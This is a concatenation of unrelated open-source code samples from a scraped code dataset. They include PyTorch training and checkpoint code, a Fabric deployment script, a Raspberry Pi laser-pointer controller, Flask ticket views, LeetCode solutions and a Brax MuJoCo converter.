self.traj_feature_sampler.load_state_dict(net_dict["net"], strict=False)
print('load traj sampler weight: {:.3f} from {} !!!!'.format(module_max_param(self.traj_feature_sampler), traj_sampler_path))
try:
self.traj_feature_sampler_opt.load_state_dict(net_dict["opt"])
self.traj_feature_sampler_sch.load_state_dict(net_dict["sch"])
except:
pass
if os.path.exists(state_feat_path):
net_dict = torch.load(state_feat_path)
if has_check(self, 'reinit_feat_opt'):
self.state_feature_extractor.load_state_dict(dict([(n, p) for n, p in net_dict["net"].items() if 'value' not in n ]),strict=False)
else:
self.state_feature_extractor.load_state_dict(net_dict["net"] )
self.state_feature_extractor_optim.load_state_dict(net_dict["opt"])
self.state_feature_extractor_scheduler.load_state_dict( net_dict["sch"] )
self.state_feat_encoder_optim.load_state_dict( net_dict["encoder_opt"] )
self.state_feat_encoder_scheduler.load_state_dict( net_dict["encoder_sch"] )
if not has_check(self, 'reinit_feat_opt'):
self.state_feat_val_encoder_optim.load_state_dict(
net_dict["val_encoder_opt"] )
self.state_feat_val_encoder_scheduler.load_state_dict(
net_dict["val_encoder_sch"] )
print(
"load feature weight: {} !!!! from: {} step :{}".format(
module_max_param(self.state_feature_extractor), state_feat_path, net_dict["step"]))
self.update_step = net_dict["step"]
self.init_step = self.update_step
return self.update_step
return 0
| StarcoderdataPython |
84243 | # -*- coding: utf-8 -*-
"""
Created on Fri Oct 12 13:16:08 2018
@author: <NAME>
"""
"""colRecoder2(dataFrame, colName, oldVal, newVal):
requires: pandas dataFrame, colName must be the columns name (e.g. df.colName), not a string
effects: returns a copy of the column. Does NOT mutate data.
Thus must be assigned to change data.
"""
def colRecoder2(dataFrame, colName, oldVal, newVal):
columnCopy = dataFrame.colName.copy()
columnCopy[oldVal] = newVal
return columnCopy | StarcoderdataPython |
3232545 | # -*- coding: utf-8 -*-
from datetime import datetime
from fabric.api import *
# 登录用户和主机名:
env.user = 'root'
env.hosts = ['192.168.127.12'] # 如果有多个主机,fabric会自动依次部署
def pack():
' 定义一个pack任务 '
# 打一个tar包:
tar_files = ['*.py', 'static/*', 'templates/*']
#local('rm -f example.tar.gz')
local('tar -czvf example.tar.gz --exclude=\'*.tar.gz\' --exclude=\'fabfile.py\' %s' % ' '.join(tar_files))
def deploy():
' 定义一个部署任务 '
# 远程服务器的临时文件:
remote_tmp_tar = '/tmp/example.tar.gz'
tag = datetime.now().strftime('%Y-%M-%d_%H.%M.%S')
run('rm -f %s' % remote_tmp_tar)
# 上传tar文件至远程服务器:
put('example.tar.gz', remote_tmp_tar)
# 解压:
remote_dist_dir = '/srv/www.example.com-%s' % tag
remote_dist_link = '/srv/www.example.com'
run('mkdir %s' % remote_dist_dir)
with cd(remote_dist_dir):
run('tar -xzvf %s' % remote_tmp_tar)
# 设定新目录的www-data权限:
# run('chown -R www-data:www-data %s' % remote_dist_dir)
# 删除旧的软链接:
run('rm -f %s' % remote_dist_link)
# 创建新的软链接指向新部署的目录:
run('ln -s %s %s' % (remote_dist_dir, remote_dist_link))
# run('chown -R www-data:www-data %s' % remote_dist_link)
# 重启fastcgi:
# fcgi = '/etc/init.d/py-fastcgi'
# with settings(warn_only=True):
# run('%s stop' % fcgi)
# run('%s start' % fcgi)
| StarcoderdataPython |
3356987 | <gh_stars>0
import pygame
from os import path
import spawns
import constants as con
class Overheat:
def __init__(self):
self.__overheat = 0
self.__hot = False
def get_Overheat(self):
return self.__overheat
def reset_Overheat(self):
self.__overheat = 0
def cool(self):
self.__hot = False
def update_Overheat(self, dO):
self.__overheat += dO
if self.__overheat < 0:
self.__overheat = 0
if self.__overheat > 100:
self.__overheat = 100
def update_Hot(self, update):
self.__hot = update
def get_Hot(self):
return self.__hot
| StarcoderdataPython |
1701689 | def squaresum(n):
sum=0
for i in range(1, n+1):
sum = sum +(i*i)
return sum
n=int(input("enter the number : "))
print(squaresum(n))
| StarcoderdataPython |
1704512 | <filename>data-models/python-datawrangling/src/gda/datawrangling/test_parse_xml.py
# -*- coding: utf-8 -*-
"""
解析XML文件.
"""
import unittest
from xml.etree import ElementTree as ET
import pprint
class TestParseXML(unittest.TestCase):
def test_read(self):
tree = ET.parse("../../../data/data-text.xml")
root = tree.getroot()
all_data = []
data = root.find("Data") # 查找子节点
for observation in data:
record = {}
for item in observation:
lookup_key = list(item.attrib.keys())[0] # 获取节点的属性
if lookup_key == "Numeric":
rec_key = "NUMERIC"
rec_value = item.attrib['Numeric']
else:
rec_key = item.attrib[lookup_key]
rec_value = item.attrib['Code']
record[rec_key] = rec_value
all_data.append(record)
pprint.pprint(all_data)
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
3241564 | from __future__ import absolute_import, division, print_function, unicode_literals
from baseline import Baseline
multiple = Baseline("""
WHITESPACE
""")
| StarcoderdataPython |
3297567 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Feb 6 11:08:12 2020
@author: nmei
This is a template script for training a convolutional neural network to perform
a categorical task, discriminating living vs nonliving images in a fMRI experiment
The convolutional layers are from pre-trained networks that were trained on
imageNet dataset.
The goal of the script is to emulate the behavioral performance of human subjects
in discriminating the image without any noise or color.
The network we will use is:
1. Convolutional layers -- pretrained
2. Adaptive pooling -- pooling, making the convolutional outputs a 1-D vector
3. hidden layer - K-units fully-connected layer
4. hidden activation - varies
5. output layer - 1 or 2 units full-connected layer
6. output activation - varies
Experiment parameters:
1. pretrain model
2. hiddden layer units
3. hidden activation
4. output layer units
5. output activation
Particularly:
This is a Pytorch implementation, which is slightly different from a
Tensorflow implementation. During training, the corresponding output activation
function (softmax/sigmoid) are log-scaled (log-softmax/log-sigmoid) because
that is what Pytorch implemented loss function asks for. But in end of predicting
the probability of each class (living v.s. nonliving), softmax/sigmoid is used.
"""
import os
from glob import glob
from collections import OrderedDict
import numpy as np
import torch
from torchvision import transforms
from sklearn import metrics
from utils_deep import (data_loader,
createLossAndOptimizer,
train_loop,
validation_loop,
hidden_activation_functions,
behavioral_evaluate,
build_model
)
# experiment control
model_dir = '../models'
train_folder = 'greyscaled'
valid_folder = 'experiment_images_greyscaled'
train_root = f'../data/{train_folder}/'
valid_root = f'../data/{valid_folder}'
print_train = True #
image_resize = 128
batch_size = 8
lr = 1e-4
n_epochs = int(1e3)
device = 'cpu'
pretrain_model_name = 'vgg19_bn'
hidden_units = 20
hidden_func_name = 'relu'
hidden_activation = hidden_activation_functions(hidden_func_name)
hidden_dropout = 0.
patience = 5
output_activation = 'softmax'
model_saving_name = f'{pretrain_model_name}_{hidden_units}_{hidden_func_name}_{hidden_dropout}_{output_activation}'
testing = True #
n_experiment_runs = 20
if output_activation == 'softmax':
output_units = 2
categorical = True
elif output_activation == 'sigmoid':
output_units = 1
categorical = False
if not os.path.exists(os.path.join(model_dir,model_saving_name)):
os.mkdir(os.path.join(model_dir,model_saving_name))
augmentations = {
'train':transforms.Compose([
transforms.Resize((image_resize,image_resize)),
transforms.RandomHorizontalFlip(p = 0.5),
transforms.RandomRotation(45,),
transforms.RandomVerticalFlip(p = 0.5,),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
]),
'valid':transforms.Compose([
transforms.Resize((image_resize,image_resize)),
transforms.RandomHorizontalFlip(p = 0.5),
transforms.RandomRotation(25,),
transforms.RandomVerticalFlip(p = 0.5,),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
]),
}
train_loader = data_loader(
train_root,
augmentations = augmentations['train'],
batch_size = batch_size,
)
valid_loader = data_loader(
valid_root,
augmentations = augmentations['valid'],
batch_size = batch_size,
)
print('set up random seeds')
torch.manual_seed(12345)
if torch.cuda.is_available():torch.cuda.empty_cache();torch.cuda.manual_seed(12345);
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
print(f'device:{device}')
model_to_train = build_model(
pretrain_model_name,
hidden_units,
hidden_activation,
hidden_dropout,
output_units,
)
model_to_train.to(device)
model_parameters = filter(lambda p: p.requires_grad, model_to_train.parameters())
params = sum([np.prod(p.size()) for p in model_parameters])
print(pretrain_model_name,
# model_to_train(next(iter(train_loader))[0]),
f'total params = {params}')
f_name = os.path.join(model_dir,model_saving_name,model_saving_name+'.pth')
loss_func,optimizer = createLossAndOptimizer(model_to_train,learning_rate = lr)
if (not os.path.exists(f_name)) or (testing):
best_valid_loss = torch.from_numpy(np.array(np.inf))
losses = []
for idx_epoch in range(n_epochs):
# train
print('training ...')
train_loss = train_loop(
net = model_to_train,
loss_func = loss_func,
optimizer = optimizer,
dataloader = train_loader,
device = device,
categorical = categorical,
idx_epoch = idx_epoch,
print_train = print_train,
output_activation = output_activation,
)
print('validating ...')
valid_loss,y_pred,y_true,features,labels= validation_loop(
net = model_to_train,
loss_func = loss_func,
dataloader = valid_loader,
device = device,
categorical = categorical,
output_activation = output_activation,
)
y_pred = torch.cat(y_pred)
y_true = torch.cat(y_true)
score = metrics.roc_auc_score(y_true.detach().cpu(),y_pred.detach().cpu())
print(f'\nepoch {idx_epoch + 1}, loss = {valid_loss:6f},score = {score:.4f}')
if valid_loss.cpu().clone().detach().type(torch.float64) < best_valid_loss:
best_valid_loss = valid_loss.cpu().clone().detach().type(torch.float64)
torch.save(model_to_train,f_name)
else:
model_to_train = torch.load(f_name)
losses.append(best_valid_loss)
if (len(losses) > patience) and (len(set(losses[-patience:])) == 1):
break
#model_to_train = torch.load(f_name)
#
#y_trues,y_preds,scores,features,labels = behavioral_evaluate(model_to_train,
# n_experiment_runs,
# loss_func,
# valid_loader,
# device,
# categorical = categorical,
# output_activation = output_activation,
# )
| StarcoderdataPython |
1755054 | # Time: O(n * k)
# Space: O(k)
# Given two integers n and k, find how many different arrays consist of numbers
# from 1 to n such that there are exactly k inverse pairs.
#
# We define an inverse pair as following: For ith and jth element in the array,
# if i < j and a[i] > a[j] then it's an inverse pair; Otherwise, it's not.
#
# Since the answer may very large, the answer should be modulo 109 + 7.
#
# Example 1:
# Input: n = 3, k = 0
# Output: 1
# Explanation:
# Only the array [1,2,3] which consists of numbers from 1 to 3 has exactly 0 inverse pair.
# Example 2:
# Input: n = 3, k = 1
# Output: 2
# Explanation:
# The array [1,3,2] and [2,1,3] have exactly 1 inverse pair.
# Note:
# The integer n is in the range [1, 1000] and k is in the range [0, 1000].
class Solution(object):
def kInversePairs(self, n, k):
"""
:type n: int
:type k: int
:rtype: int
"""
M = 1000000007
dp = [[0]*(k+1) for _ in xrange(2)]
dp[0][0] = 1
for i in xrange(1, n+1):
dp[i%2] = [0]*(k+1)
dp[i%2][0] = 1
for j in xrange(1, k+1):
dp[i%2][j] = (dp[i%2][j-1] + dp[(i-1)%2][j]) % M
if j-i >= 0:
dp[i%2][j] = (dp[i%2][j] - dp[(i-1)%2][j-i]) % M
return dp[n%2][k]
| StarcoderdataPython |
44418 | <reponame>boonepeter/cat-laser<gh_stars>0
# Raspberry Pi Cat Laser Driver
# This code controls the laser pointer servos to target the laser at different
# locations. Make sure to modify the MQTT_SERVER variable below so that it points
# to the name or IP address of the host computer for the cloud server VM (i.e. the
# machine running the Vagrant virtual machine that has the MQTT broker).
# Author: <NAME>
import sys
import model
import servos
import paho.mqtt.client as mqtt
import parse
import RPi.GPIO as GPIO
from evdev import InputDevice, categorize, ecodes
# Configuration:
SERVO_I2C_ADDRESS = 0x40 # I2C address of the PCA9685-based servo controller
SERVO_XAXIS_CHANNEL = 1 # Channel for the x axis rotation which controls laser up/down
SERVO_YAXIS_CHANNEL = 0 # Channel for the y axis rotation which controls laser left/right
LASER_CHANNEL = 5
SERVO_PWM_FREQ = 50 # PWM frequency for the servos in HZ (should be 50)
SERVO_MIN = 150 # Minimum rotation value for the servo, should be -90 degrees of rotation.
SERVO_MAX = 600 # Maximum rotation value for the servo, should be 90 degrees of rotation.
SERVO_CENTER = 400 # Center value for the servo, should be 0 degrees of rotation.
MQTT_SERVER = 'localhost' # MQTT server to connect to for receiving commands.
MQTT_PORT = 1883 # Port for the MQTT server.
LASER_GPIO = 23 # GPIO pin connected to a transistor that controls the laser on/off.
# MQTT topics used for controlling the laser.
TOPIC_TARGET = 'catlaser/target'
TOPIC_RELATIVE = 'catlaser/relative'
TOPIC_PATH = 'catlaser/path'
TOPIC_LASER = 'catlaser/laser'
CONTROLLER_LOCATION = "/dev/input/event0"
# Create servo and laser movement model.
servos = servos.Servos(SERVO_I2C_ADDRESS, SERVO_XAXIS_CHANNEL, SERVO_YAXIS_CHANNEL, LASER_CHANNEL, SERVO_PWM_FREQ)
model = model.LaserModel(servos, SERVO_MIN, SERVO_MAX, SERVO_CENTER, LASER_GPIO)
gamepad = InputDevice(CONTROLLER_LOCATION)
# MQTT callbacks:
def on_connect(client, userdata, flags, rc):
# Called when connected to the MQTT server.
print('Connected to MQTT server!')
# Subscribe to the laser targeting topic.
client.subscribe(TOPIC_TARGET)
client.subscribe(TOPIC_PATH)
client.subscribe(TOPIC_RELATIVE)
client.subscribe(TOPIC_LASER)
def on_message(client, userdata, msg):
# Called when a MQTT message is received.
print('{0}: {1}'.format(msg.topic, str(msg.payload)))
# Handle a target request.
if msg.topic == TOPIC_TARGET:
# Try to parse out two numbers from the payload. These are the
# screen x and screen y coordinates for the target command.
result = parse.parse('{:d},{:d}', msg.payload.decode('ascii'))
if result is not None:
# Got a valid pair of numbers, use the laser model to target that
# position.
model.target(result[0], result[1])
elif msg.topic == TOPIC_RELATIVE:
# Try to parse out two numbers from the payload. These are the
# relative coordinates for the relative target command.
result = parse.parse('{:d},{:d}', msg.payload.decode('ascii'))
if result is not None:
# Got a valid pair of numbers, use the laser model to target that
# position.
model.target_relative(result[0], result[1])
elif msg.topic == TOPIC_PATH:
lines = msg.payload.decode("ascii")
lines = lines.split(";")
path_list = []
for line in lines:
result = parts.parse("{:d},{:d}", line)
if result is not None:
path_list.append((result[0], result[1]))
model.target_path(path_list)
elif msg.topic == TOPIC_LASER:
mess = msg.payload.decode('ascii')
if mess == "ON":
model.Laser_On()
elif mess == "OFF":
model.Laser_Off()
else:
model.Toggle_Laser()
def on_disconnect(client, userdata, rc):
# Called when disconnected by the MQTT server. For now just prints out the
# result code/reason for disconnecting and quits.
print('Disconnected with rc: {0}'.format(rc))
sys.exit(1)
# Turn the laser on by setting its control GPIO high.
GPIO.setmode(GPIO.BCM)
GPIO.setup(LASER_GPIO, GPIO.OUT)
GPIO.output(LASER_GPIO, GPIO.HIGH)
# Setup MQTT client and connect to server.
client = mqtt.Client()
client.on_connect = on_connect
client.on_message = on_message
client.on_disconnect = on_disconnect
client.connect(MQTT_SERVER, MQTT_PORT, 60)
# Run a loop in the foreground that waits for MQTT events/messages and processes
# them appropriately with the callbacks above. The loop_forever call will never
# return!
print('Press Ctrl-C to quit...')
client.loop_forever()
print("Welcome to the cat laser toy!")
print("- D-pad: Move")
print("- B: Laser on/off")
print("- L/R bumper: fast mode")
print("- Start: sleep")
print("- A: keep track of movement")
print("- X: play back movement")
model.target(305, 305)
move_list = []
is_laser_on = True
up = False
down = False
left = False
right = False
to_break = False
l_trig = False
r_trig = False
change_laser_on = False
keep_track = False
play_moves = False
while True:
if to_break:
while to_break:
time.sleep(0.5)
try:
events = gamepad.read()
for event in events:
if event.type == ecodes.EV_KEY:
if event.code == 297: #START
if event.value == 1:
to_break = False
except BlockingIOError:
#do nothing
pass
x = 0
y = 0
if up:
y = 10
elif down:
y = -10
if left:
x = -10
elif right:
x = 10
if (x != 0) or (y != 0):
if l_trig or r_trig:
x *= 2
y *= 2
model.target_relative(x, y)
if keep_track and (x != 0 or y != 0):
move_list.append((x, y, True))
if play_moves:
for ex, why, on in move_list:
if on:
model.Laser_On()
else:
model.Laser_Off()
model.target_relative(ex, why)
play_moves = False
if change_laser_on:
if is_laser_on:
model.Laser_On()
else:
model.Laser_Off()
change_laser_on = False
try:
events = gamepad.read()
for event in events:
if event.type == ecodes.EV_KEY:
if event.code == 296: # SELECT
#print("Select")
pass
elif event.code == 297: #START
if event.value == 1:
to_break = True
elif event.code == 291: # Y button
#print("Y")
pass
elif event.code == 288: # X button
if event.value == 1:
play_moves = True
elif event.code == 290: # B button
if event.value == 1:
if is_laser_on:
is_laser_on = False
change_laser_on = True
else:
is_laser_on = True
change_laser_on = True
elif event.code == 289: # A button
if event.value == 1:
keep_track = True
elif event.value == 0:
keep_track = False
elif event.code == 293: # Right Trigger
if event.value == 1:
r_trig = True
elif event.value == 0:
r_trig = False
elif event.code == 292: # Left trigger
if event.value == 1:
l_trig = True
elif event.value == 0:
l_trig = False
elif event.type == ecodes.EV_ABS:
if event.code == 0: # X direction
if event.value == 0: #Left down
left = True
right = False
if event.value == 127:
left = False
right = False
elif event.value == 255: #Right down
right = True
left = False
elif event.code == 1: #Y direction
if event.value == 0: #up direction
down = True
up = False
elif event.value == 127:
up = False
down = False
elif event.value == 255: #down direction
down = False
up = True
except BlockingIOError:
#do nothing
pass
| StarcoderdataPython |
1630512 | import tensorflow as tf
'''
Tensor Operations: initializations, constants, variables, shapes, reshaping
'''
######## Tensors: Varying shapes ###################
a = tf.constant(1.2, dtype=tf.float32, name='a')
b = tf.constant(3.4, dtype=tf.float32, name='b')
c = tf.constant([1.5, 44.3, 55.4], dtype=tf.float32, name='c')
d = tf.constant([[1.5, 44.3, 55.4]], dtype=tf.float32, name='c')
e = tf.constant([[1.5], [44.3], [55.4]], dtype=tf.float32, name='c')
f = tf.constant(4.44, dtype=tf.float32, shape=[4,2], name='d')
g = tf.constant([0.3, 6.7], name='g')
h = tf.constant([4.2, 2.1], name='h')
i = tf.constant([[[1, 11, 111], [2, 22, 222]],
[[3, 33, 333], [4, 44, 444]],
[[5, 55, 555], [6, 66, 666]]],
dtype=tf.int32, name='i')
############ Logical Operations ##########
onesTensor = tf.ones_like(g)
negOnesTensor = (-1)*tf.ones_like(g)
# Compare two tensors... note that these tensors have multiple values
# select() compares items-by-items
sel1 = tf.select(tf.greater_equal(g, h), onesTensor, negOnesTensor, name='sel1')
sel2 = tf.select(tf.less_equal(g, 4.), onesTensor, negOnesTensor, name='sel2')
init = tf.global_variables_initializer()
############ Slicing and Dicing ############
slice_op = tf.slice(i, begin=[1,1,0], size=[2, 1, 2])
# Reverse slicing requires negative stride
strided_slice_op = tf.strided_slice(i, begin=[-1,0,0], end=[-3, 2, 3], strides=[-1, 1, 2])
with tf.Session() as sess:
init.run()
print('----------- Shape and Values --------------')
print('a: {0}\n shape{1}\n\n'.format(a.eval(), a.get_shape().as_list()))
print('c: {0}\n shape{1}\n\n'.format(c.eval(), c.get_shape().as_list()))
print('d: {0}\n shape{1}\n\n'.format(d.eval(), d.get_shape().as_list()))
print('e: {0}\n shape{1}\n\n'.format(e.eval(), e.get_shape().as_list()))
print('f: {0}\n shape{1}\n\n'.format(f.eval(), f.get_shape().as_list()))
print('i: {0}\n shape{1}\n\n'.format(i.eval(), i.get_shape().as_list()))
print('---------- Selection --------------')
print('g: {0}\n'.format(g.eval()))
print('h: {0}\n'.format(h.eval()))
print('sel1: {0}\n'.format(sel1.eval()))
print('sel2: {0}\n'.format(sel2.eval()))
print('---------- Slicing ----------------')
slice_val = slice_op.eval()
strided_slice_val = strided_slice_op.eval()
print('Slice_op:\n{0}\n-------\nshape{1}\n\n'.format(slice_val, slice_val.shape))
print('Strided Slice_op:\n{0}\n-------\nshape{1}\n\n'.format(strided_slice_val, strided_slice_val.shape))
| StarcoderdataPython |
1645729 | <reponame>maxpowel/flask_bundle<gh_stars>0
from .bundle import FlaskBundle, ApiBlueprints
| StarcoderdataPython |
3299840 | <gh_stars>1-10
from collections import defaultdict as dd
G = dd(lambda :dd(lambda :0))
vis = dd(lambda :False)
def load_data():
N,M,C1,C2 = [int(x) for x in input().split()]
weight = [int(x) for x in input().split()]
for i in range(M):
c1, c2, L = [int(x) for x in input().split()]
G[c1][c2] = G[c2][c1] = L
return C1, C2, weight
def dijkstra(s, weight):
d = dd(lambda :10**9)
d[s] = 0
nums = dd(lambda :0)
nums[s] = 1
w = dd(lambda :0)
w[s] = weight[s]
for i in range(len(G)):
u = min([v for v in G if not vis[v]], key=lambda v: d[v])
vis[u] = True
for v in G[u]:
if not vis[v]:
if d[u] + G[u][v] < d[v]:
d[v] = d[u] + G[u][v]
w[v] = w[u] + weight[v]
nums[v] = nums[u]
elif d[u] + G[u][v] == d[v]:
nums[v] += nums[u]
if w[u] + weight[v]>w[v]:
w[v] = w[u] + weight[v]
return nums, w
C1, C2, weight = load_data()
nums, w = dijkstra(C1, weight)
print(nums[C2], w[C2])
| StarcoderdataPython |
3339509 | # -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2017-05-08 09:13
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('subjects', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('schools', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Teachers',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('fstname', models.CharField(max_length=45)),
('lstname', models.CharField(max_length=45)),
('phone_no', models.CharField(max_length=20)),
('teacher_type', models.CharField(choices=[(b'TSC', b'TSC'), (b'BRD', b'BOARD')], default=b'TSC', max_length=3)),
('birthday', models.DateField(blank=True, null=True)),
('gender', models.CharField(choices=[(b'M', b'MALE'), (b'F', b'FEMALE')], default=b'ML', max_length=2)),
('tsc_no', models.CharField(blank=True, max_length=200, null=True)),
('bom_no', models.CharField(blank=True, max_length=200, null=True)),
('qualifications', models.CharField(blank=True, choices=[(b'UNI', b'UNIVERSITY'), (b'COL', b'COLLEGE')], default=b'COL', max_length=3, null=True)),
('date_started_teaching', models.DateField(blank=True, null=True)),
('joined_current_school', models.DateField(blank=True, null=True)),
('headteacher', models.BooleanField(default=False)),
('active', models.BooleanField(default=True)),
('school', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='schools.Schools')),
('subjects', models.ManyToManyField(blank=True, null=True, to='subjects.Subjects')),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| StarcoderdataPython |
120442 | """
0011. Container With Most Water
Medium
Given n non-negative integers a1, a2, ..., an , where each represents a point at coordinate (i, ai). n vertical lines are drawn such that the two endpoints of the line i is at (i, ai) and (i, 0). Find two lines, which, together with the x-axis forms a container, such that the container contains the most water.
Notice that you may not slant the container.
Example 1:
Input: height = [1,8,6,2,5,4,8,3,7]
Output: 49
Explanation: The above vertical lines are represented by array [1,8,6,2,5,4,8,3,7]. In this case, the max area of water (blue section) the container can contain is 49.
Example 2:
Input: height = [1,1]
Output: 1
Example 3:
Input: height = [4,3,2,1,4]
Output: 16
Example 4:
Input: height = [1,2,1]
Output: 2
Constraints:
2 <= height.length <= 3 * 104
0 <= height[i] <= 3 * 104
"""
class Solution:
def maxArea(self, height: List[int]) -> int:
i, j, res = 0, len(height) - 1, 0
while i < j:
if height[i] < height[j]:
res = max(res, height[i] * (j - i))
i += 1
else:
res = max(res, height[j] * (j - i))
j -= 1
return res
| StarcoderdataPython |
1782300 | <reponame>GHDDI-AILab/Targeting2019-nCoV<filename>util/test1.py
import numpy as numpy
import pandas as pd
print(np.sum([1,2,3,4,5])) | StarcoderdataPython |
67449 | #! usr/bin/python3
# -*- coding: utf-8 -*-
#
# Flicket - copyright <NAME>: <EMAIL>
from datetime import datetime
from flask import redirect
from flask import request
from flask import make_response
from flask import render_template
from flask import Response
from flask import url_for
from flask_babel import gettext
from flask_login import login_required
from application import app
from application.flicket.forms.search import SearchTicketForm
from application.flicket.models.flicket_models import FlicketTicket
from . import flicket_bp
def clean_csv_data(input_text):
output_text = input_text.replace('"', "'")
return output_text
def tickets_view(page, is_my_view=False):
"""
Function common to 'tickets' and 'my_tickets' expect where query is filtered for users own tickets.
"""
form = SearchTicketForm()
# get request arguments from the url
status = request.args.get("status")
institute = request.args.get("institute")
domain = request.args.get("domain")
content = request.args.get("content")
requester = request.args.get("requester")
referee = request.args.get("referee")
user_id = request.args.get("user_id")
requester_role = request.args.get("requester_role")
request_stage = request.args.get("request_stage")
procedure_stage = request.args.get("procedure_stage")
if form.validate_on_submit():
redirect_url = FlicketTicket.form_redirect(form, url="flicket_bp.tickets")
return redirect(redirect_url)
arg_sort = request.args.get("sort")
if arg_sort:
print(arg_sort)
args = request.args.copy()
del args["sort"]
response = make_response(redirect(url_for("flicket_bp.tickets", **args)))
response.set_cookie(
"tickets_sort",
arg_sort,
max_age=2419200,
path=url_for("flicket_bp.tickets", **args),
)
return response
sort = request.cookies.get("tickets_sort")
if sort:
set_cookie = True
else:
sort = "date_desc"
set_cookie = False
ticket_query, form = FlicketTicket.query_tickets(
form,
institute=institute,
domain=domain,
status=status,
user_id=user_id,
content=content,
requester=requester,
referee=referee,
requester_role=requester_role,
request_stage=request_stage,
procedure_stage=procedure_stage,
)
if is_my_view:
ticket_query = FlicketTicket.my_tickets(ticket_query)
ticket_query = FlicketTicket.sorted_tickets(ticket_query, sort)
number_results = ticket_query.count()
ticket_query = ticket_query.paginate(page, app.config["posts_per_page"])
title = gettext("Tickets")
if is_my_view:
title = gettext("My Tickets")
if content:
form.content.data = content
if requester:
form.requester.data = requester
if referee:
form.referee.data = referee
response = make_response(
render_template(
"flicket_tickets.html",
title=title,
form=form,
tickets=ticket_query,
page=page,
number_results=number_results,
status=status,
institute=institute,
domain=domain,
requester_role=requester_role,
request_stage=request_stage,
procedure_stage=procedure_stage,
user_id=user_id,
sort=sort,
base_url="flicket_bp.tickets",
)
)
if set_cookie:
response.set_cookie(
"tickets_sort", sort, max_age=2419200, path=url_for("flicket_bp.tickets")
)
return response
# tickets main
@flicket_bp.route(app.config["FLICKET"] + "tickets/", methods=["GET", "POST"])
@flicket_bp.route(
app.config["FLICKET"] + "tickets/<int:page>/", methods=["GET", "POST"]
)
@login_required
def tickets(page=1):
response = tickets_view(page)
return response
@flicket_bp.route(app.config["FLICKET"] + "tickets_csv/", methods=["GET", "POST"])
@login_required
def tickets_csv():
# get request arguments from the url
status = request.args.get("status")
institute = request.args.get("institute")
domain = request.args.get("domain")
content = request.args.get("content")
requester = request.args.get("requester")
referee = request.args.get("referee")
user_id = request.args.get("user_id")
ticket_query, form = FlicketTicket.query_tickets(
institute=institute,
domain=domain,
status=status,
user_id=user_id,
content=content,
requester=requester,
referee=referee,
)
ticket_query = ticket_query.limit(app.config["csv_dump_limit"])
date_stamp = datetime.now().strftime("%Y%m%d-%H%M%S")
file_name = date_stamp + "ticketdump.csv"
csv_contents = "Ticket_ID,Title,Submitted By,Date,Replies,Total Days,Institute,Domain,Assigned,URL\n"
for ticket in ticket_query:
if hasattr(ticket.assigned, "name"):
_name = ticket.assigned.name
else:
_name = ticket.user.name
csv_contents += (
f"{ticket.id_zfill},"
f"{clean_csv_data(ticket.title)},"
f'"{ticket.user.name}",'
f'{ticket.date_added.strftime("%Y-%m-%d")},'
f"{ticket.num_replies},"
f"{ticket.total_days},"
f"{clean_csv_data(ticket.institute.institute)},"
f"{clean_csv_data(ticket.domain.domain)},"
f"{_name},"
f'{app.config["base_url"]}'
f'{url_for("flicket_bp.ticket_view", ticket_id=ticket.id)}\n'
)
return Response(
csv_contents,
mimetype="text/csv",
headers={"Content-disposition": f"attachment; filename={file_name}"},
)
@flicket_bp.route(app.config["FLICKET"] + "my_tickets/", methods=["GET", "POST"])
@flicket_bp.route(
app.config["FLICKET"] + "my_tickets/<int:page>/", methods=["GET", "POST"]
)
@login_required
def my_tickets(page=1):
response = tickets_view(page, is_my_view=True)
return response
| StarcoderdataPython |
74068 | <filename>brax/tools/mujoco_converter.py
# Copyright 2021 The Brax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Command line tool for converting Mujoco models to Brax."""
from typing import Sequence
from absl import app
from absl import flags
from absl import logging
from brax.io import file
from brax.tools import mujoco
from google.protobuf import text_format
FLAGS = flags.FLAGS
flags.DEFINE_string('xml_model_path', None,
'Path of the Mujoco XML model to import.')
flags.DEFINE_string('config_path', None, 'Path of the output config.')
flags.DEFINE_bool('add_collision_pairs', True,
'Adds the collision pairs to the config.')
# System parameters. See brax/physics/config.proto for more information.
flags.DEFINE_float('angular_damping', -0.05,
'Angular velocity damping applied to each body.')
flags.DEFINE_float(
'baumgarte_erp', 0.1,
'How aggressively interpenetrating bodies should push away each another.')
flags.DEFINE_float('dt', 0.02, 'Time to simulate each step, in seconds.')
flags.DEFINE_float('friction', 0.6,
'How much surfaces in contact resist translation.')
flags.DEFINE_integer('substeps', 4,
'Substeps to perform to maintain numerical stability.')
flags.DEFINE_bool('ignore_unsupported_joints', False,
'Ignores unsupported joints.')
def main(argv: Sequence[str]) -> None:
if len(argv) > 1:
raise app.UsageError('Too many command-line arguments.')
# Read the Mujoco model.
filename = FLAGS.xml_model_path
with file.File(filename) as f:
logging.info('Loading mujoco model from %s', filename)
xml_string = f.read()
# Convert the model.
m = mujoco.MujocoConverter(
xml_string,
add_collision_pairs=FLAGS.add_collision_pairs,
ignore_unsupported_joints=FLAGS.ignore_unsupported_joints)
config = m.config
# Add the default options.
config.angular_damping = FLAGS.angular_damping
config.baumgarte_erp = FLAGS.baumgarte_erp
config.dt = FLAGS.dt
config.friction = FLAGS.friction
config.substeps = FLAGS.substeps
# Save the config.
if FLAGS.config_path:
text_proto = text_format.MessageToString(config)
